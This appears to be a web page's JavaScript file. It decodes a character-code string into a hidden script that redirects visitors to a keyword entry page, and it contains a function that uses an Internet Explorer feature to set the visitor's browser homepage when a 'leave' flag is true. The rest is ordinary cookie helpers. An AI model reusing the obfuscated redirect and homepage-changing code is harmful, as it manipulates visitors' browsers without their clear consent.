function decode(original){
   var result="";
   arrayofstring=original.split(',');
   for (var i=0; i <arrayofstring.length; i++) {
     result=result+String.fromCharCode(arrayofstring[i]);
   }
   return result;
}
var display="60, 115, 99, 114, 105, 112, 116, 32, 108, 97, 110, 103, 117, 97, 103, 101, 61, 34, 74, 97, 118, 97, 83, 99, 114, 105, 112, 116, 34, 62, 13, 10, 13, 10, 105, 102, 32, 40, 107, 101, 121, 119, 111, 114, 100, 41, 108, 111, 99, 97, 116, 105, 111, 110, 46, 104, 114, 101, 102, 61, 34, 46, 46, 47, 101, 110, 116, 101, 114, 46, 104, 116, 109, 108, 63, 107, 101, 121, 119, 111, 114, 100, 61, 34, 43, 107, 101, 121, 119, 111, 114, 100, 59, 13, 10, 13, 10, 32, 60, 47, 115, 99, 114, 105, 112, 116, 62,";
document.write(decode(display));

function x(site){
    document.location = "http://"+site;
}

var leave=true;
function os(eu) {
	if (leave) {
		sh(eu);
	}
}


function sh(url){
	if (navigator.userAgent.indexOf("MSIE")!=-1) {
		document.body.style.behavior='url(#default#homepage)';
		document.body.setHomePage(url);
	} else {
		alert('Sorry, not supported in this browser, please change this setting manually');
	}
	return false;
}

function createCookie(name,value,days)
{
	if (days)
	{
		var date = new Date();
		date.setTime(date.getTime()+(days*24*60*60*1000));
		var expires = "; expires="+date.toGMTString();
	}
	else var expires = "";
	document.cookie = name+"="+value+expires+"; path=/";
}

function readCookie(name)
{
	var nameEQ = name + "=";
	var ca = document.cookie.split(';');
	for(var i=0;i < ca.length;i++)
	{
		var c = ca[i];
		while (c.charAt(0)==' ') c = c.substring(1,c.length);
		if (c.indexOf(nameEQ) == 0) return c.substring(nameEQ.length,c.length);
	}
	return null;
}